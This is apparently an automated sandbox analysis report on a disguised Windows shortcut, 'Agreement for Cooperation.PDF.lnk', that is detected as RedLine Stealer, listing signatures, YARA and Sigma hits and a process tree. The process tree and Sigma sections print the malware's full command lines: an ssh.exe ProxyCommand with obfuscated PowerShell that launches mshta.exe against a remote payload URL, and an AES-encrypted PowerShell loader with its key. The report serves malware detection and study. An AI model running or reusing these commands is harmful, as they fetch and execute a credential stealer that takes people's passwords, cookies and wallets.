Edit tour

Windows Analysis Report
Agreement for Cooperation.PDF.lnk.download.lnk

Overview

General Information

Sample name:	Agreement for Cooperation.PDF.lnk.download.lnk
Analysis ID:	1573535
MD5:	afcfa278d35726531039ed7311ffb41c
SHA1:	b22377c6e7ac143abe5d83e8cc339742a12f3bf2
SHA256:	224f45017a9dbb7db7fe2836771d8f4e77c9735499c20a19c832a91b156d7056
Tags:	185-147-124-236lnkuser-JAMESWT_MHT
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected RedLine Stealer

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Powershell drops PE file

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Lolbin Ssh.exe Use As Proxy

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

ssh.exe (PID: 5896 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)

conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4436 cmdline: powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']') MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 5516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 5560 cmdline: "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07D82E69F8043E40065E720A1B159FDD6D422B58B784FC0DC1FBD4AA773C81457678A232A511A9D003C4DB9E025EF9F458C995E02A85E47A1C1D08ABA6C6B961E1EAC27D4CA93357F222D315807604E1295E626467CA86739D1FB7D74E330D45B35F3FAFDD866ED5DA7163AA4769CA8211369E714E434BEEE33B686127CF828CE28B733D87D9F7EB917D362A6E7119EA05B27F6B7E73281AB2282F3B7DB5BEB87E51F8CE4C3C0E5FDCF0A61EDFFDC42860D4F83CFCE4AF856390F0FE361B1A850DE1143E75D4F49BAE8ABB1E1722A2785BEE26D4FF5435842F86C401E050C61E995F3CCD79DBFAC63');$RoyR=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((xmCKI('71477A505565504A52655A7563627948')),[byte[]]::new(16)).TransformFinalBlock($LWTKB,0,$LWTKB.Length)); & $RoyR.Substring(0,3) $RoyR.Substring(334) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

updater.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Local\Temp\47891652\updater.exe" C:\Users\user\AppData\Local\Temp\47891652\bovZdOEN.bin MD5: C56B5F0201A3B3DE53E561FE76912BFD)

InstallUtil.exe (PID: 3408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 3372 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

svchost.exe (PID: 1532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

AutoIt3.exe (PID: 7128 cmdline: "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)

InstallUtil.exe (PID: 1684 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

AutoIt3.exe (PID: 3580 cmdline: "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)

InstallUtil.exe (PID: 5448 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000003.2230558308.0000000004940000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.2230558308.0000000004940000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000003.2351472227.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2351472227.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000002.2233978914.0000000004160000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2233978914.0000000004160000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000010.00000002.2432130192.0000000003D00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2432130192.0000000003D00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000003.2351600972.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2351600972.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000003.2230437653.0000000004B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.2230437653.0000000004B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000010.00000003.2428369373.00000000044E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2428369373.00000000044E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: powershell.exe PID: 6524	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2696b2:$b1: ::WriteAllBytes( 0x269ea0:$b1: ::WriteAllBytes( 0x1346:$s1: -join 0x2ddb0:$s1: -join 0x2ed24:$s1: -join 0x3ba2e:$s1: -join 0x3c0a0:$s1: -join 0x43682:$s1: -join 0x44548:$s1: -join 0x4537b:$s1: -join 0x49a55:$s1: -join 0x49a90:$s1: -join 0x49b57:$s1: -join 0x49b85:$s1: -join 0x49d63:$s1: -join 0x49d86:$s1: -join 0x4a045:$s1: -join 0x4a066:$s1: -join 0x4a098:$s1: -join 0x4a0e0:$s1: -join 0x4a10d:$s1: -join
Process Memory Space: updater.exe PID: 3780	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: updater.exe PID: 3780	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: updater.exe PID: 3780	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 7128	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: AutoIt3.exe PID: 7128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 7128	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 1684	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 1684	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 3580	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: AutoIt3.exe PID: 3580	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 3580	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.AutoIt3.exe.442c974.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.AutoIt3.exe.442c974.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.AutoIt3.exe.442c974.1.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
11.2.updater.exe.417c974.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.updater.exe.417c974.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.updater.exe.417c974.1.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
15.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.2.InstallUtil.exe.400000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
11.2.updater.exe.417c974.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.updater.exe.417c974.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.updater.exe.417c974.1.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
16.2.AutoIt3.exe.3d1c974.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.AutoIt3.exe.3d1c974.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.AutoIt3.exe.3d1c974.1.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
16.2.AutoIt3.exe.3d1c974.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.AutoIt3.exe.3d1c974.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.AutoIt3.exe.3d1c974.1.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
14.2.AutoIt3.exe.442c974.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.AutoIt3.exe.442c974.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.AutoIt3.exe.442c974.1.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
Click to see the 16 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5516, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4, ProcessId: 5560, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F6